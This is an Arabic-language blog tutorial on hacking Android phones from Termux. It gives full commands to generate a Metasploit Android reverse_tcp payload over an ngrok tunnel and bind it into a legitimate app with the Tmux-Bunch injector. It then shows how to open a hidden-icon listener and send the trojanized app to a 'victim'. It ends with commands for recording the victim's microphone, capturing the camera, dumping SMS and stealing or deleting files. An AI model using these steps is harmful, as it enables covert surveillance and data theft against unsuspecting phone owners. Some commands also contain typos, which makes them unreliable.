أحدث المواضيع Ho
 

شرح كامل حقن تطبيق بايلود والاختراق من metasploit

(0)
الرئيسية#termux
+حجم الخط-

 


Termux

شرح كامل للاختراق و الحقن metasploit 

 تعريف مصطلحات والادوات اللي بنستخدمها

 شرح مبسط اولي

رابط تحميل تيرمكس

اساسيات تيرمكس

 تحميل الميتاسبلويت

تحميل نجروك 

 الدخول الى الرابط التالي وهو موقع نجروك الاساسي :

 مابعد التحميل :

شرح فتح بورت نجروك

 حل عدم فتح بورت 

صنع بايلود تطبيق من الميتاسبلويت 

 فتح جلسة تنصت بايلود تطبيق

 تحميل حاقن تطبيقات

حقن بايلود في تطبيق 

 تفاصيل عن الحاقن

فتح جلسة التنصت تطبيق بايلود تطبيق

اوامر التحكم بجهاز الضحيه


 تعريف مصطلحات والادوات اللي بنستخدمها



المصطلح الاول


بورت|Port

منفذ او شباك للوصل بين شيئين

المصطلح الثاني 






 بايلود|pyload

حمولة يتم ارسالها للضحيه لكي يفتح منفذ او باب سري في الجهاز تتيح للمخترق التسلل للجهاز 





المصطلح الثالث 


جلسة تنصت

مكان ارسال واستقبال الاوامر والملفات من جهازك الى جهاز الضحيه والعكس




السكربت الاول

ميتاسبلوست|ميتا|metasploit

هو عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها







السكربت الثاني 


نجروك|ngrok

اداة تقوم بفتح بورت (منفذ للاتصال و الارسال بين الضحية و المهاجم )







السكربت الثالث 


تيمكس|temux bunch

اداة لحقن البايلودات في التطبيقات




السكربت الرابع


 Exploit Android Stagefright

حقن فيديو واختراق الجهاز بفيديو



 شرح مبسط اولي

لكي نخترق جهاز اولا يجب ان نصنع بايلود لكي نرسله الى الضحيه ثم نفتح جلسة تنصت ونربط البايلود و جلسة التنصت باستخدام بورت 



رابط تحميل تيرمكس


رابط التحميل من جوجل بلاي :

 https://play.google.com/store/apps/details?id=com.termux

يفضل تحميل ترمكس من جوجل نسخه المتجر فيها اعطال كثيره

رابط تحميل مباشر

https://apkcombo.com/ar/termux/com.termux/



اساسيات تيرمكس


[+] افتح تيرمكس

[+] اكتب الاوامر التالية :


termux-setup-storage
pkg update -y 
pkg upgrade -y 
 pkg install git -y 
pkg install python -y 
 pkg install python2 -y 

 pkg install curl -y 

 pkg install wget -y 

pkg install ruby -y 

 pkg install perl -y 

 pkg install proot -y 



 تحميل الميتاسبلويت


 افتح تيرمكس

اكتب الاوامر التالية :



curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
chmod +x metasploit.sh
bash metasploit.sh
cd metaaploit-framework
bundle install rake-12.3.1
bundle config build.nokogiri--use-system--libraries
gem install nokogiri
gem install pkg-config -v rake-12.3.1
bundle install rake-12.3.1



تحميل نجروك 


 الدخول الى الرابط التالي وهو موقع نجروك الاساسي :

 https://ngrok.com


 الضغط على كلمة sign up التي بالاحمر لتسجيل حساب جديد

 

 إملاء الخانات التاليه المعروضة في الموقع :

 your name|اسمك

 your email|إيميلك

confirm email|اعد كتابة ايميلك

password|كلمة السر

 وخذ اختبار الكابتشا 

 اضغط على  sign up

 إنتهى شرح تسجيل الدخول

 انزل الى الاسفل وسنجد 4 مربعات


 المربع الاول : download ngrok

المربع الثاني : unzip to install

 المربع الثالث : confirm your account

المربع الرابع : fire it up

 سنحتاج الاول والثالث فقط 

 نضغط المريع الاول وسيبدء التحميل




 مابعد التحميل :


ادخل الى تيرمكس


cd /sdcard/download

امر الدخول الى الذاكرة الداخليه/ملف التحميلات




cp ngrok-stable-linux-arm.zip $HOME

امر نسخ ملف النجروك الى الهوم




cd $HOME

امر الدخول للهوم




unzip ngrok-stable-linux-arm.zip

 فك الضغط عن ملف نجروك




 rm ngrok-stable-linux-arm.zip

 امر حذف الملف المضغوط




الدخول الى الموقع والتوجه الى المربع الثالث ستجدون رمز طويل بالخط الابيض وخلفيه سوداء انسخوه 

 


اذهبو الى تيرمكس

 الصقو الرمز 




شرح فتح بورت نجروك

الدخول الى تيرمكس


 cd $HOME 


 ./ngrok tcp [port]


 يفضل فتح البورت 4444 او 8080



 مثال :

 ./ngrok tcp 4444

طريقة التاكد من ان البورت مفتوح

ظهور كلمة online بالاخضر



 حل عدم فتح بورت 

 الذهاب الى تيرمكس

اكتب


apt update
apt upgrade 
pkg install proot
termux-chroot


اذا لم ينجح :

فعل الفي بي ان 

اذا لم ينجح :

اذا لم ينجح :

شغل 3g او 4g

غير تحديث التيرمكس 

اذا لم ينجح :

 المشكلة ليست مع الطريقة ستكون المشكلة من مزود الخدمه بعض الشركات لا تسمح بفتح بورتات في الشبكة 



صنع بايلود تطبيق من الميتاسبلويت 

ادخل الى التيرمكس

فتح بورت ونسخ البورت المفتوح


cd $HOME/metasploit-framework


msfvenom -p android/meterpreter/reverse_tcp LHOST=tcp://0.tcp.ngrok.io LPORT=$port -o /sdcard/$name.apk



مكان $port ضعو البورت المقتوح

مكان $name ضعو اسم التطبيق

 سيتم صنع البورت ونقله الى الصفحه الرئيسية من الذاكرة الداخليه



 فتح جلسة تنصت بايلود تطبيق

[+] الذهاب الى تيرمكس

cd /$HOME/metasploit-framework
./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost tcp://0.tcp.ngrok.io
set lport $port
exploit -x hide_app_icon

[+] ارسل التطبيق الى الضحيه



 تحميل حاقن تطبيقات

اسم سكربت الحاقن هو temux-bunch

الدخول الى تيرمكس


git clone https://github.com/Hax4us/Tmux-Bunch
cd $HOME 
cd Tmux-Bunch
chmod +x ./setup
./setup



حقن بايلود في تطبيق 

 نضع التطبيق المراد حقنه في تلصفحة الرئيسية من الذاكرة الداخليه

نفتح بورت في الشبكه


الدخول الى تيرمكس 



امر الدخول الئ الذاكرة الداخلية

cd /sdcard


امر نقل التطبيق الئ واجهة التيرمكس الرئيسية 

mv $name.apk $HOME


امر الذهاب الئ واجهة التيرمكس الرئيسية 

cd $HOME


امر نقل التطبيق الئ اداة الحقن

mv $name.apk temux-bunch


امر الدخول الئ مجلد اداة الحقن

cd tmux-bunch


امر نقل التطبيق الئ مجلد binder

mv $name.apk binder


امر تشغيل الاداة

./tmuxbunch


بعد تشخيل الاداه 

نكتب بلترتيب :

6
1
tcp://0.tcp.ngrok.io
$port
$name

اضغط انتر مرتين

10

انتر


امر الدخول الئ مجلد embout الذي يتواجد فيه التطبيق الذي تم حقنة

cd embout



امر نقل التطبيق الئ واجهة Termux الرئيسية 

mv $name.apk $HOME



امر العودة مرتين الئ واجهة Termux الرئيسية 

cd ....



امر نقل التطبيق الئ ذاكرة الجهاز الداخلية

mv $name.apk /sdcard



 


ستجد التطبيق في الصفحه الرئيسيه من الذاكره الداخليه



 تفاصيل عن الحاقن

 بعض الاحيان لن يستطيع الحاقن من حقن البايلود في تطبيق لان التطبيق محمي


فتح جلسة التنصت تطبيق بايلود تطبيق

الذهاب الى تيرمكس

اكتب



للدخول الئ الميتاسبلويت

cd /$HOME/metasploit-framework



تشغيل الميتاسبلويت 

./msfconsole



استخدام خاصية الاتصال بلجهاز البعيد

use exploit/multi/handler



نختار نوع البرمجية في الجهاز البعيد 

set payload android/meterpreter/reverse_tcp



نضع الهوست الذي هو سيرفر ngrok الموجود بلحمولة من اجل الاتصال بلجهاز البعيد

set lhost tcp://0.tcp.ngrok.io


نضع البورت او المنفذ

set lport $port


نقوم بتشغيل انتضار اتصال الجهاز البعيد

exploit -x hide_app_icon




من ثم ارسل التطبيق الى الضحيه




اوامر التحكم بجهاز الضحيه



reboot

لاعادة تشغيل جهاز الضحيه



shultdown

 لاطفاء جهاز الضحيه



screenshot

لتصوير شاشة الضحيه



ps

 لاظهار البرامج الشغاله في جهاز الضحيه





upload /sdcard/$name.apk $name.apk

لارسال برنامج او كلف الى جهاز الضحيه





download $name.apk

 لتحميل ملف من جهاز الضحيه الى جهازك





cd /sdcard

 لدخول الى ملفات الضحيه





rm $name.name

لحذف ملف من جهاز الضحيه





record_mic -d $s

 لتسجيل صوت من جهاز الضحيه

$s تمثل عدد ثواني التسجيل





webcam_snap

لتصوير من الكاميرا الاماميه





webcam_stream -d $s

لتصوير فيديو من الكاميرا الاماميه





dump_sms

لاظهار رسائل الاس ام اس





cd $file

 تمثل $file اسم الملف

للدخول الى ملف معين




cd ..

للرجوع الى الملف السابق




cd /sdcard1

 للدخول الى الذاكرة الخارجيه

  • فيس بوك
  • بنترست
  • تويتر
  • واتس اب
  • لينكد ان
  • بريد
author-img
amf

إظهار التعليقات
  • تعليق عادي
  • تعليق متطور
    • عن طريق المحرر بالاسفل يمكنك اضافة تعليق متطور كتعليق بصورة او فيديو يوتيوب او كود او اقتباس فقط قم بادخال الكود او النص للاقتباس او رابط صورة او فيديو يوتيوب ثم اضغط على الزر بالاسفل للتحويل قم بنسخ النتيجة واستخدمها للتعليق

تعليقات: (0) إضافة تعليق

نحن نستخدم ملفات تعريف الارتباط من Google لتقديم خدماتنا وتحليل عدد الزيارات لهذا السبب تتم مشاركة عنوان IP ووكيل المستخدم التابعين لك مع Google بالإضافة إلى مقاييس الأداء والأمان لضمان جودة الخدمة وإنشاء إحصاءات الاستخدام واكتشاف إساءة الاستخدام ومعالجتهاإعرف المزيداوافق